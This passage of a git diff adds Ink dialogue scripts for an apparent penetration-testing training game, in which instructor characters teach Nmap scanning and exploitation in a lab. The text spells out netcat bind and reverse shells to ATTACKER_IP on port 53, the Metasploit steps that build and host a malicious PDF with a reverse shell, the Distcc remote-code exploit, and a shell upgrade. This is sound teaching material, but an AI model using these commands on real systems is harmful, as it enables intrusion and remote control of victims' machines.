nmap -T3 TARGET + + Reconnaissance Specialist: Aggressive: nmap -T4 TARGET + + Reconnaissance Specialist: Insane: nmap -T5 TARGET + + ~ instructor_rapport += 3 + ++ [Show me output commands] + Reconnaissance Specialist: **Nmap Output:** + + Reconnaissance Specialist: Normal output: nmap -oN filename TARGET + + Reconnaissance Specialist: XML output: nmap -oX filename TARGET + + Reconnaissance Specialist: Grepable output: nmap -oG filename TARGET + + Reconnaissance Specialist: All formats: nmap -oA basename TARGET + + Reconnaissance Specialist: View output file: less filename + + ~ instructor_rapport += 3 + ++ [Show me combined scan examples] + Reconnaissance Specialist: **Combined Scans:** + + Reconnaissance Specialist: Fast aggressive scan with version detection: + + Reconnaissance Specialist: nmap -T4 -F -sV IP_ADDRESS + + Reconnaissance Specialist: Comprehensive scan all ports with OS and version detection: + + Reconnaissance Specialist: sudo nmap -T4 -p- -O -sV -oA comprehensive_scan IP_ADDRESS + + Reconnaissance Specialist: Stealth scan specific ports: + + Reconnaissance Specialist: sudo nmap -T2 -sS -p 80,443,8080 IP_ADDRESS + + ~ instructor_rapport += 3 + +- -> scanning_hub + +=== challenge_tips === +Reconnaissance Specialist: Let me give you some practical tips for succeeding in the scanning challenges. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: **Finding Live Hosts:** + +Reconnaissance Specialist: Use Nmap's default ping sweep - it's more reliable than just ICMP echo: sudo nmap -sn NETWORK_RANGE + +Reconnaissance Specialist: Note all discovered IP addresses. Your Kali VM will be one of them, and your targets will be the others. + +Reconnaissance Specialist: The first three octets of all systems in the lab will match. + ++ [Tips for port scanning?] + Reconnaissance Specialist: Start with a default Nmap scan to find the most common open ports quickly: nmap IP_ADDRESS + + Reconnaissance Specialist: Then do a comprehensive scan of all ports to find hidden services: nmap -p- IP_ADDRESS + + Reconnaissance Specialist: Remember, there's often a service on an unusual high port that you'll miss if you only scan common ports! + + Reconnaissance Specialist: Use -T4 to speed things up on the lab network: nmap -T4 -p- IP_ADDRESS + + ~ instructor_rapport += 5 + ++ [Tips for banner grabbing?] + Reconnaissance Specialist: When banner grabbing with netcat, be patient. Some services send the banner immediately, others wait for you to send something first. + + Reconnaissance Specialist: For HTTP (port 80), type any character and press Enter to trigger a response. + + Reconnaissance Specialist: Look carefully at all the banner information - sometimes flags are encoded in the banners! + + Reconnaissance Specialist: The hint mentions a flag is encoded using a common method - think base64 or similar. + + ~ instructor_rapport += 5 + ++ [What about that familiar vulnerability?] + Reconnaissance Specialist: The instructions hint at "a familiar vulnerability" that you can exploit. + + Reconnaissance Specialist: Think back to vulnerabilities you've seen in previous labs - Distcc perhaps? + + Reconnaissance Specialist: Make sure you scan ALL ports, not just the common ones, to find it. + + Reconnaissance Specialist: Once you find the vulnerable service, you know what to do from the previous lab! + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Reconnaissance Specialist: If you're not finding expected results, double-check your network range. Use hostname -I on Kali to confirm. + + Reconnaissance Specialist: Make sure the victim VMs are actually running - check the Hacktivity dashboard. + + Reconnaissance Specialist: If scans seem to hang, try reducing the timing or checking your network connectivity. + + Reconnaissance Specialist: Remember that -p- (all ports) scans take time. Be patient or use -T4 to speed it up. + + Reconnaissance Specialist: Always use sudo for SYN scans, UDP scans, and OS detection - they require root privileges. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== ready_for_practice === +Reconnaissance Specialist: Excellent! You're ready to start the practical scanning exercises. + +~ instructor_rapport += 10 +~ scanning_ethics += 10 + +Reconnaissance Specialist: Remember: this knowledge is powerful. Network scanning without authorization is illegal in most jurisdictions. + +Reconnaissance Specialist: You have permission to scan the lab VMs. Never scan external networks, your school network, or any systems you don't own without explicit written authorization. + +Reconnaissance Specialist: In professional penetration testing, you'll have a scope document that clearly defines what you're allowed to scan. + ++ [Any final advice?] + Reconnaissance Specialist: Start simple - find live hosts first, then scan common ports, then expand to all ports. + + Reconnaissance Specialist: Document everything you find. Take notes on IP addresses, open ports, and service versions. + + Reconnaissance Specialist: Read the Nmap man page regularly - it's one of the best sources of information: man nmap + + Reconnaissance Specialist: Don't forget to look for those flags - in banners, on unusual ports, and via exploitation of familiar vulnerabilities! + + Reconnaissance Specialist: Most importantly: be patient and methodical. Scanning is about being thorough, not fast. + + ~ instructor_rapport += 10 + +- -> scanning_hub + +-> END diff --git a/story_design/ink/game_scenarios/vulnerabilities_exploits.ink b/story_design/ink/game_scenarios/vulnerabilities_exploits.ink new file mode 100644 index 0000000..2fe7450 --- /dev/null +++ b/story_design/ink/game_scenarios/vulnerabilities_exploits.ink @@ -0,0 +1,750 @@ +// Vulnerabilities, Exploits, and Remote Access Payloads Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/3_vulnerabilities.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR exploitation_ethics = 0 + +// External variables +EXTERNAL player_name + +=== start === +Penetration Testing Instructor: Welcome, Agent {player_name}. I'm your instructor for Vulnerabilities and Exploitation. + +~ instructor_rapport = 0 +~ exploitation_ethics = 0 + +Penetration Testing Instructor: This lab explores one of the most critical threats in cybersecurity: software vulnerabilities. Even systems running only "trusted" software from major vendors can be compromised due to programming mistakes. + +Penetration Testing Instructor: We'll explore how attackers exploit weaknesses in software systems, the difference between bind shells and reverse shells, and get hands-on with the Metasploit framework. + +Penetration Testing Instructor: Let me be clear: this knowledge is for authorized security testing, penetration testing engagements, and defensive purposes only. Understanding how attacks work is essential for defending against them. + +~ exploitation_ethics += 10 + +-> vulnerability_hub + +=== vulnerability_hub === +Penetration Testing Instructor: What aspect of vulnerabilities and exploitation would you like to explore? + ++ [What are software vulnerabilities?] + -> software_vulnerabilities_intro ++ [What causes software vulnerabilities?] + -> vulnerability_causes ++ [Exploits and payloads - what's the difference?] + -> exploits_payloads ++ [Types of payloads and shellcode] + -> shellcode_intro ++ [Bind shells - how do they work?] + -> bind_shell_concept ++ [Reverse shells - the modern approach] + -> reverse_shell_concept ++ [Network Address Translation (NAT) considerations] + -> nat_considerations ++ [Introduction to Metasploit Framework] + -> metasploit_intro ++ [Using msfconsole - the interactive console] + -> msfconsole_basics ++ [Local exploits - attacking client applications] + -> local_exploits ++ [Remote exploits - attacking network services] + -> remote_exploits ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== software_vulnerabilities_intro === +Penetration Testing Instructor: Excellent question. A software vulnerability is a weakness in the security of a program. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Think about it this way: what if an attacker wants to run malicious code on a system that only allows "trusted" software from companies like Microsoft or Adobe? + +Penetration Testing Instructor: Unfortunately, it turns out that writing secure code is quite hard. Innocent and seemingly small programming mistakes can cause serious security vulnerabilities. + +Penetration Testing Instructor: In many cases, software vulnerabilities can lead to attackers being able to take control of the vulnerable software. When an attacker can run any code they like, this is known as "arbitrary code execution." + ++ [What does arbitrary code execution allow an attacker to do?] + Penetration Testing Instructor: With arbitrary code execution, attackers can essentially assume the identity of the vulnerable software and misbehave. + + Penetration Testing Instructor: For example, if they compromise a web browser, they can access anything the browser can access - your files, your cookies, your session tokens. + + Penetration Testing Instructor: If they compromise a system service running as administrator or root, they have complete control over the entire system. + + ~ instructor_rapport += 5 + ++ [Can you give me a real-world example?] + Penetration Testing Instructor: Sure. Adobe Reader versions before 8.1.2 had vulnerabilities that allowed attackers to craft malicious PDF documents. + + Penetration Testing Instructor: When a victim opened the PDF, the attacker could execute arbitrary code on their system - just by opening what appeared to be a normal document. + + Penetration Testing Instructor: Another example is the Distcc vulnerability (CVE-2004-2687). Anyone who could connect to the Distcc port could execute arbitrary commands on the server. + + ~ instructor_rapport += 5 + ++ [Tell me more about the causes] + -> vulnerability_causes + +- -> vulnerability_hub + +=== vulnerability_causes === +Penetration Testing Instructor: Software vulnerabilities arise from three main categories of mistakes. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: First, there are design flaws - fundamental mistakes in how the system was architected. These are problems with the concept itself, not just the implementation. + +Penetration Testing Instructor: Second, implementation flaws - mistakes in the programming code. This includes buffer overflows, SQL injection vulnerabilities, cross-site scripting flaws, and so on. + +Penetration Testing Instructor: Third, misconfiguration - mistakes in settings and configuration. Even secure software can be made vulnerable through poor configuration choices. + ++ [Which type is most common?] + Penetration Testing Instructor: Implementation flaws are incredibly common because programming secure code is difficult, especially in languages like C and C++ that don't have built-in protections. + + Penetration Testing Instructor: However, misconfigurations are also extremely prevalent because systems are complex and it's easy to overlook security settings. + + Penetration Testing Instructor: Design flaws are less common but can be more fundamental and harder to fix without major rearchitecture. + + ~ instructor_rapport += 5 + ++ [Can these vulnerabilities be completely prevented?] + Penetration Testing Instructor: That's a great question that gets at a fundamental challenge in security. + + Penetration Testing Instructor: Complete prevention is nearly impossible in complex software. However, we can significantly reduce vulnerabilities through secure coding practices, code review, security testing, and using modern languages with built-in protections. + + Penetration Testing Instructor: This is why defense in depth is important - we assume vulnerabilities will exist and add layers of protection. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== exploits_payloads === +Penetration Testing Instructor: Let me clarify these two important concepts. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: An exploit is an action - or a piece of software that performs an action - that takes advantage of a vulnerability. + +Penetration Testing Instructor: The result is that an attacker makes the system perform in ways that are not intentionally authorized. This could include arbitrary code execution, changes to databases, or denial of service like crashing the system. + +Penetration Testing Instructor: The action that takes place when an exploit is successful is known as the payload. + ++ [So the exploit is the delivery mechanism?] + Penetration Testing Instructor: Exactly! Think of it like this: the exploit is the lock pick, and the payload is what you do once you're inside. + + Penetration Testing Instructor: The exploit leverages the vulnerability to gain control, and the payload is the malicious code that runs once control is achieved. + + Penetration Testing Instructor: In Metasploit, you can mix and match exploits with different payloads, giving tremendous flexibility. + + ~ instructor_rapport += 5 + ++ [What kinds of payloads are there?] + -> shellcode_intro + +- -> vulnerability_hub + +=== shellcode_intro === +Penetration Testing Instructor: The most common type of payload is shellcode - code that gives the attacker shell access to the target system. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: With shell access, attackers can interact with a command prompt and run commands on the target system as if they were sitting at the keyboard. + +Penetration Testing Instructor: Metasploit has hundreds of different payloads. You can list them with the msfvenom command: + +Penetration Testing Instructor: msfvenom -l payload | less + +Penetration Testing Instructor: There are two main approaches to achieving remote shell access: bind shells and reverse shells. + ++ [What's a bind shell?] + -> bind_shell_concept + ++ [What's a reverse shell?] + -> reverse_shell_concept + ++ [Which one should I use?] + Penetration Testing Instructor: In modern penetration testing, reverse shells are almost always the better choice. + + Penetration Testing Instructor: They bypass most firewall configurations and work even when the target is behind NAT. + + Penetration Testing Instructor: But let me explain both so you understand the trade-offs. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== bind_shell_concept === +Penetration Testing Instructor: A bind shell is the simplest approach. The payload listens on the network for a connection, and serves up a shell to anything that connects. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Think of it like this: the victim's computer opens a port and waits. The attacker then connects to that port and gets a command prompt. + +Penetration Testing Instructor: You can simulate this with netcat. On the victim system, run: + +Penetration Testing Instructor: nc.exe -l -p 31337 -e cmd.exe -vv + +Penetration Testing Instructor: Then from the attacker system, connect with: + +Penetration Testing Instructor: nc VICTIM_IP 31337 + ++ [What do those netcat flags mean?] + Penetration Testing Instructor: Good attention to detail! Let me break it down: + + Penetration Testing Instructor: The -l flag tells netcat to listen as a service rather than connect as a client. + + Penetration Testing Instructor: The -p flag specifies the port number to listen on. + + Penetration Testing Instructor: The -e flag executes the specified program (cmd.exe on Windows, /bin/bash on Linux) and pipes all interaction through the connection. + + Penetration Testing Instructor: The -vv flag makes it very verbose, showing you what's happening. + + ~ instructor_rapport += 5 + ++ [What's the main limitation of bind shells?] + Penetration Testing Instructor: Excellent question. Firewalls and NAT routing are the main problems. + + Penetration Testing Instructor: Nowadays, firewalls typically prevent incoming network connections unless there's a specific reason to allow them - like the system being a web server. + + Penetration Testing Instructor: If the victim is behind a NAT router or firewall that blocks incoming connections, your bind shell is useless. + + Penetration Testing Instructor: This is why reverse shells became the dominant approach. + + ~ instructor_rapport += 5 + ++ [Tell me about reverse shells instead] + -> reverse_shell_concept + +- -> vulnerability_hub + +=== reverse_shell_concept === +Penetration Testing Instructor: Reverse shells solve the firewall and NAT problems by reversing the connection direction. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Instead of the attacker connecting to the victim, the victim connects to the attacker! + +Penetration Testing Instructor: Here's how it works: the attacker starts listening on their system, then the payload on the victim's system initiates an outbound connection to the attacker. + +Penetration Testing Instructor: This works because firewalls typically allow outbound connections. They have to - otherwise you couldn't browse websites or check email. + ++ [How do you set up a reverse shell with netcat?] + Penetration Testing Instructor: On the attacker system (Kali), start listening: + + Penetration Testing Instructor: nc -l -p 53 -vv + + Penetration Testing Instructor: On the victim system, connect back: + + Penetration Testing Instructor: nc.exe ATTACKER_IP 53 -e cmd.exe -vv + + Penetration Testing Instructor: Notice the victim is making the connection, but you still get a shell on your attacker system. + + ~ instructor_rapport += 5 + ++ [Why use port 53 specifically?] + Penetration Testing Instructor: Brilliant observation! Port 53 is used by DNS - the Domain Name System that resolves domain names to IP addresses. + + Penetration Testing Instructor: Almost every Internet-connected system needs DNS to function. It's how "google.com" becomes an IP address. + + Penetration Testing Instructor: Because DNS is essential, it's extremely rare for firewalls to block outbound connections on port 53. + + Penetration Testing Instructor: By using port 53, we're disguising our reverse shell connection as DNS traffic, making it very likely to get through. + + ~ instructor_rapport += 5 + ++ [What about NAT and public IP addresses?] + -> nat_considerations + +- -> vulnerability_hub + +=== nat_considerations === +Penetration Testing Instructor: Network Address Translation adds another complication worth understanding. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Often computer systems share one public IP address via a router, which then sends traffic to the correct local IP address using NAT. + +Penetration Testing Instructor: Unless port forwarding is configured on the router, there's no way to connect directly to a system without a public IP address. + +Penetration Testing Instructor: This is another reason reverse shells are necessary - they can start connections from behind NAT to systems with public IPs. + ++ [So the attacker needs a public IP?] + Penetration Testing Instructor: For a reverse shell to work, yes - the attacker needs a publicly routable IP address, or port forwarding from one. + + Penetration Testing Instructor: This is why attackers often use VPS (Virtual Private Servers) or compromised servers as command and control infrastructure. + + Penetration Testing Instructor: In penetration testing engagements, you might work with the client's network team to set up proper port forwarding. + + ~ instructor_rapport += 5 + ++ [What if both systems are behind NAT?] + Penetration Testing Instructor: Then you'd need more advanced techniques like tunneling through a public server, or exploiting Universal Plug and Play (UPnP) to create port forwards. + + Penetration Testing Instructor: Some attack frameworks use domain generation algorithms or communicate through third-party services like social media APIs. + + Penetration Testing Instructor: But that's getting into advanced command and control techniques beyond this basic lab. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== metasploit_intro === +Penetration Testing Instructor: The Metasploit Framework is one of the most powerful and comprehensive tools for exploitation and penetration testing. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: At its core, Metasploit provides a framework - a set of libraries and tools for exploit development and deployment. + +Penetration Testing Instructor: It includes modules for specific exploits, payloads, encoders, post-exploitation tools, and other extensions. + +Penetration Testing Instructor: The framework has several interfaces you can use: msfconsole (the interactive text console), the web-based Metasploit Community/Pro editions, and Armitage (a graphical interface). + ++ [How many exploits does it include?] + Penetration Testing Instructor: Depending on the version and when it was last updated, Metasploit typically includes over two thousand different exploits! + + Penetration Testing Instructor: When you start msfconsole, it reports the exact number of exploit modules available. + + Penetration Testing Instructor: You can see them all with the "show exploits" command, though that list is quite long. + + ~ instructor_rapport += 5 + ++ [What's the typical workflow for using an exploit?] + Penetration Testing Instructor: Great question. Here's the standard process: + + Penetration Testing Instructor: First, specify the exploit to use. Second, set options for the exploit like the IP address to attack. Third, choose a payload - this defines what happens on the compromised system. + + Penetration Testing Instructor: Optionally, you can choose encoding to evade security monitoring like anti-malware or intrusion detection systems. + + Penetration Testing Instructor: Finally, launch the exploit and see if it succeeds. + + Penetration Testing Instructor: The flexibility to combine any exploit with different payloads and encoding is what makes Metasploit so powerful. + + ~ instructor_rapport += 5 + ++ [Tell me more about msfconsole] + -> msfconsole_basics + +- -> vulnerability_hub + +=== msfconsole_basics === +Penetration Testing Instructor: Msfconsole is the interactive console interface that many consider the preferred way to use Metasploit. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Start it by simply running "msfconsole" - though it may take a moment to load. + +Penetration Testing Instructor: Once it's running, you have access to all of Metasploit's features through an interactive command line. + ++ [What commands should I know?] + Penetration Testing Instructor: Let me give you the essentials: + + Penetration Testing Instructor: "help" shows all available commands. "show exploits" lists all exploit modules. "show payloads" lists available payloads. + + Penetration Testing Instructor: "use exploit/path/to/exploit" selects an exploit. "show options" displays what needs to be configured. + + Penetration Testing Instructor: "set OPTION_NAME value" configures an option. "exploit" or "run" launches the attack. + + Penetration Testing Instructor: "back" returns you to the main context if you want to change exploits. + + ~ instructor_rapport += 5 + ++ [Can I run regular shell commands too?] + Penetration Testing Instructor: Yes! You can run local programs directly from msfconsole, similar to a standard shell. + + Penetration Testing Instructor: For example, "ls /home/kali" works just fine from within msfconsole. + + Penetration Testing Instructor: This is convenient because you don't need to exit msfconsole to check files or run quick commands. + + ~ instructor_rapport += 5 + ++ [Does it have tab completion?] + Penetration Testing Instructor: Absolutely! Msfconsole has excellent tab completion support. + + Penetration Testing Instructor: You can press TAB while typing exploit paths, options, or commands to autocomplete them. + + Penetration Testing Instructor: You can also use UP and DOWN arrow keys to navigate through your command history. + + Penetration Testing Instructor: These features make it much faster to work with Metasploit. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== local_exploits === +Penetration Testing Instructor: Local exploits target applications running on the victim's computer, rather than network services. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: These often require some social engineering to get the victim to open a malicious file or visit a malicious website. + +Penetration Testing Instructor: A classic example is the Adobe PDF Escape EXE vulnerability (CVE-2010-1240). This affected Adobe Reader versions before 8.1.2. + ++ [How does the PDF exploit work?] + Penetration Testing Instructor: You craft a malicious PDF document that exploits a vulnerability in how Adobe Reader processes embedded executables. + + Penetration Testing Instructor: When the victim opens the PDF, they're prompted to execute a payload with a message that encourages them to click "Open." + + Penetration Testing Instructor: If they click it, your payload executes on their system with their privileges. + + Penetration Testing Instructor: The Metasploit module is "exploit/windows/fileformat/adobe_pdf_embedded_exe" + + ~ instructor_rapport += 5 + ++ [Walk me through creating a malicious PDF] + Penetration Testing Instructor: Sure! In msfconsole, start with: + + Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe + + Penetration Testing Instructor: Then set the filename: set FILENAME timetable.pdf + + Penetration Testing Instructor: Choose a payload: set PAYLOAD windows/shell/reverse_tcp + + Penetration Testing Instructor: Configure where to connect back: set LHOST YOUR_IP and set LPORT YOUR_PORT + + Penetration Testing Instructor: Finally, run the exploit to generate the malicious PDF. + + Penetration Testing Instructor: To receive the reverse shell, you need to set up a handler before the victim opens the PDF. + + ~ instructor_rapport += 5 + ++ [How do I set up the handler to receive the connection?] + Penetration Testing Instructor: Good question! You use the multi/handler exploit: + + Penetration Testing Instructor: use exploit/multi/handler + + Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp + + Penetration Testing Instructor: set LHOST YOUR_IP + + Penetration Testing Instructor: set LPORT YOUR_PORT (must match what you used in the PDF) + + Penetration Testing Instructor: Then run it and leave it listening. When the victim opens the PDF and clicks through, you'll get a shell! + + ~ instructor_rapport += 5 + ++ [How would I deliver this PDF to a victim?] + Penetration Testing Instructor: In a real penetration test, you might host it on a web server and send a phishing email with a link. + + Penetration Testing Instructor: For the lab, you can start Apache web server and host the PDF there. + + Penetration Testing Instructor: Create a share directory: sudo mkdir /var/www/html/share + + Penetration Testing Instructor: Copy your PDF there: sudo cp /home/kali/.msf4/local/timetable.pdf /var/www/html/share/ + + Penetration Testing Instructor: Start Apache: sudo service apache2 start + + Penetration Testing Instructor: Then the victim can browse to http://YOUR_IP/share/timetable.pdf + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== remote_exploits === +Penetration Testing Instructor: Remote exploits are even more dangerous because they target network services directly exposed to the Internet. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: No social engineering required - if the vulnerable service is accessible, you can often compromise it without any user interaction! + +Penetration Testing Instructor: A great example is the Distcc vulnerability (CVE-2004-2687). Distcc is a program to distribute compilation of C/C++ code across systems on a network. + ++ [What makes Distcc vulnerable?] + Penetration Testing Instructor: Distcc has a documented security issue where anyone who can connect to the port can execute arbitrary commands as the distcc user. + + Penetration Testing Instructor: There's no authentication, no authorization checks. If you can reach the port, you can run commands. It's that simple. + + Penetration Testing Instructor: This is a design flaw - the software was built for trusted networks and doesn't include any security controls. + + ~ instructor_rapport += 5 + ++ [How do I exploit Distcc with Metasploit?] + Penetration Testing Instructor: The exploit module is exploit/unix/misc/distcc_exec. Let me walk you through it: + + Penetration Testing Instructor: First, use the exploit: use exploit/unix/misc/distcc_exec + + Penetration Testing Instructor: Set the target: set RHOST VICTIM_IP + + Penetration Testing Instructor: Choose a payload: set PAYLOAD cmd/unix/reverse + + Penetration Testing Instructor: Configure your listener: set LHOST YOUR_IP and set LPORT YOUR_PORT + + Penetration Testing Instructor: Then launch: exploit + + Penetration Testing Instructor: Unlike the PDF exploit, msfconsole automatically starts the reverse shell handler for remote exploits! + + ~ instructor_rapport += 5 + ++ [Can I check if a target is vulnerable first?] + Penetration Testing Instructor: Great thinking! Some Metasploit exploits support a "check" command. + + Penetration Testing Instructor: After setting your options, run "check" to see if the target appears vulnerable. + + Penetration Testing Instructor: Not all exploits support this, and it's not 100% reliable, but it's worth trying. + + Penetration Testing Instructor: For Distcc specifically, the check function isn't supported, but trying it doesn't hurt. + + ~ instructor_rapport += 5 + ++ [What level of access do I get?] + Penetration Testing Instructor: With Distcc, you typically get user-level access as the "distccd" user. + + Penetration Testing Instructor: You won't have root (administrator) access initially, but you can access anything that user can access. + + Penetration Testing Instructor: From there, you might attempt privilege escalation to gain root access, which is often the ultimate goal on Unix systems. + + Penetration Testing Instructor: Even without root, a compromised user account can cause significant damage. + + ~ instructor_rapport += 5 + ++ [How can I make the shell more usable?] + Penetration Testing Instructor: The initial shell from cmd/unix/reverse is quite basic. You can upgrade it to an interactive shell: + + Penetration Testing Instructor: Run: python -c 'import pty; pty.spawn("/bin/bash")' + + Penetration Testing Instructor: This spawns a proper bash shell with better command line editing and behavior. + + Penetration Testing Instructor: Then you'll have a more normal feeling shell prompt to work with. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== commands_reference === +Penetration Testing Instructor: Let me give you a comprehensive commands reference for this lab. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: **Listing Metasploit Payloads:** + +Penetration Testing Instructor: msfvenom -l payload | less + +Penetration Testing Instructor: **Bind Shell Simulation with Netcat:** + +Penetration Testing Instructor: On victim: nc.exe -l -p 31337 -e cmd.exe -vv + +Penetration Testing Instructor: On attacker: nc VICTIM_IP 31337 + ++ [Show me reverse shell commands] + Penetration Testing Instructor: **Reverse Shell with Netcat:** + + Penetration Testing Instructor: On attacker: nc -l -p 53 -vv + + Penetration Testing Instructor: On victim: nc.exe ATTACKER_IP 53 -e cmd.exe -vv + + ~ instructor_rapport += 3 + ++ [Show me msfconsole basics] + Penetration Testing Instructor: **Msfconsole Basics:** + + Penetration Testing Instructor: Start console: msfconsole + + Penetration Testing Instructor: Get help: help + + Penetration Testing Instructor: List exploits: show exploits + + Penetration Testing Instructor: List payloads: show payloads + + Penetration Testing Instructor: Get exploit info: info exploit/path/to/exploit + + Penetration Testing Instructor: Select exploit: use exploit/path/to/exploit + + Penetration Testing Instructor: Show options: show options + + Penetration Testing Instructor: Set option: set OPTION_NAME value + + Penetration Testing Instructor: Go back: back + + Penetration Testing Instructor: Run exploit: exploit or run + + ~ instructor_rapport += 3 + ++ [Show me the Adobe PDF exploit commands] + Penetration Testing Instructor: **Adobe PDF Exploit (CVE-2010-1240):** + + Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe + + Penetration Testing Instructor: set FILENAME timetable.pdf + + Penetration Testing Instructor: set PAYLOAD windows/shell/reverse_tcp + + Penetration Testing Instructor: set LHOST YOUR_KALI_IP + + Penetration Testing Instructor: set LPORT 4444 + + Penetration Testing Instructor: run + + Penetration Testing Instructor: **Set up handler:** + + Penetration Testing Instructor: use exploit/multi/handler + + Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp + + Penetration Testing Instructor: set LHOST YOUR_KALI_IP + + Penetration Testing Instructor: set LPORT 4444 + + Penetration Testing Instructor: run + + ~ instructor_rapport += 3 + ++ [Show me the Distcc exploit commands] + Penetration Testing Instructor: **Distcc Remote Exploit (CVE-2004-2687):** + + Penetration Testing Instructor: use exploit/unix/misc/distcc_exec + + Penetration Testing Instructor: set RHOST VICTIM_IP + + Penetration Testing Instructor: set PAYLOAD cmd/unix/reverse + + Penetration Testing Instructor: set LHOST YOUR_KALI_IP + + Penetration Testing Instructor: set LPORT 4444 + + Penetration Testing Instructor: check (to see if target is vulnerable) + + Penetration Testing Instructor: exploit + + Penetration Testing Instructor: **Upgrade to interactive shell:** + + Penetration Testing Instructor: python -c 'import pty; pty.spawn("/bin/bash")' + + ~ instructor_rapport += 3 + ++ [Show me web server setup for hosting payloads] + Penetration Testing Instructor: **Web Server Setup:** + + Penetration Testing Instructor: Create share directory: sudo mkdir /var/www/html/share + + Penetration Testing Instructor: Copy payload: sudo cp /home/kali/.msf4/local/filename.pdf /var/www/html/share/ + + Penetration Testing Instructor: Start Apache: sudo service apache2 start + + Penetration Testing Instructor: Access from victim: http://KALI_IP/share/filename.pdf + + ~ instructor_rapport += 3 + ++ [Show me useful post-exploitation commands] + Penetration Testing Instructor: **Post-Exploitation Commands:** + + Penetration Testing Instructor: Windows: whoami, dir, net user, ipconfig, systeminfo + + Penetration Testing Instructor: Linux: whoami, ls -la, uname -a, ifconfig, cat /etc/passwd + + Penetration Testing Instructor: Navigate: cd DIRECTORY + + Penetration Testing Instructor: Create file: echo TEXT > filename.txt + + Penetration Testing Instructor: Open browser (Windows): explorer "https://example.com" + + ~ instructor_rapport += 3 + ++ [Show me how to find network IPs] + Penetration Testing Instructor: **Finding IP Addresses:** + + Penetration Testing Instructor: On Kali: ifconfig or hostname -I + + Penetration Testing Instructor: On Windows: ipconfig + + Penetration Testing Instructor: Note the host-only network interfaces that start with the same 3 octets. + + ~ instructor_rapport += 3 + +- -> vulnerability_hub + +=== challenge_tips === +Penetration Testing Instructor: Let me give you some practical tips for succeeding in the challenge. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: **For the Adobe PDF exploit:** + +Penetration Testing Instructor: Make sure you set up the handler BEFORE the victim opens the PDF. The reverse shell will try to connect immediately. + +Penetration Testing Instructor: The LHOST and LPORT must match between the PDF generation and the handler. + +Penetration Testing Instructor: On Windows, use Adobe Reader specifically, not Chrome's built-in PDF viewer, since we're exploiting Adobe Reader's vulnerability. + ++ [What if the PDF exploit doesn't work?] + Penetration Testing Instructor: First, check that Windows firewall isn't blocking the connection. Usually it won't block outbound connections, but double-check. + + Penetration Testing Instructor: Verify your IP addresses are correct - use the host-only network addresses that start with the same three octets. + + Penetration Testing Instructor: Make sure your handler is actually running when the victim opens the PDF. + + Penetration Testing Instructor: Check that you're opening with Adobe Reader, not another PDF viewer. + + ~ instructor_rapport += 5 + ++ [Tips for the Distcc exploit?] + Penetration Testing Instructor: The Linux victim VM is the server running Distcc. You can't open it directly - that's expected. + + Penetration Testing Instructor: The IP address typically ends in .3 and starts with the same three octets as your Kali and Windows VMs. + + Penetration Testing Instructor: After you get shell access, remember you can upgrade to an interactive shell with that Python one-liner. + + Penetration Testing Instructor: Look in the distccd user's home directory for the flag file. + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Penetration Testing Instructor: Always double-check your IP addresses. Getting the wrong IP is the most common mistake. + + Penetration Testing Instructor: Pay attention to whether you need LHOST (local host - your Kali IP) or RHOST (remote host - victim IP). + + Penetration Testing Instructor: If something doesn't work, run "show options" again to verify all settings before running the exploit. + + Penetration Testing Instructor: Use ifconfig to check your Kali IP and ipconfig to check Windows IP. + + ~ instructor_rapport += 5 + ++ [What should I do once I have shell access?] + Penetration Testing Instructor: First, verify you have access by running basic commands like "whoami" and "dir" or "ls". + + Penetration Testing Instructor: Navigate to the user's home directory and look for flag files. + + Penetration Testing Instructor: For the PDF exploit, the flag might be on the Desktop or in the user's home folder. + + Penetration Testing Instructor: For Distcc, look in /home for user directories, then search for flag files. + + Penetration Testing Instructor: Read the flag with "cat flag" or "type flag" on Windows. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== ready_for_practice === +Penetration Testing Instructor: Excellent! You're ready to start the practical exercises. + +~ instructor_rapport += 10 +~ exploitation_ethics += 10 + +Penetration Testing Instructor: Remember: the knowledge you've gained about vulnerabilities and exploitation is powerful. Use it only for authorized security testing, penetration testing engagements, and defensive purposes. + +Penetration Testing Instructor: Understanding how attacks work makes you a better defender. But wielding these tools without authorization is both illegal and unethical. + +Penetration Testing Instructor: In the lab environment, you'll practice both local exploits (the Adobe PDF vulnerability) and remote exploits (the Distcc vulnerability). + ++ [Any final advice before I start?] + Penetration Testing Instructor: Take your time and read the error messages carefully. Metasploit is verbose and will tell you what went wrong. + + Penetration Testing Instructor: Use tab completion and command history to work more efficiently. + + Penetration Testing Instructor: Document what you're doing as you go - it helps with troubleshooting and writing reports later. + + Penetration Testing Instructor: Most importantly: if you get stuck, check "show options" to verify your settings, and make sure your IP addresses are correct. + + Penetration Testing Instructor: Good luck, Agent {player_name}. This is 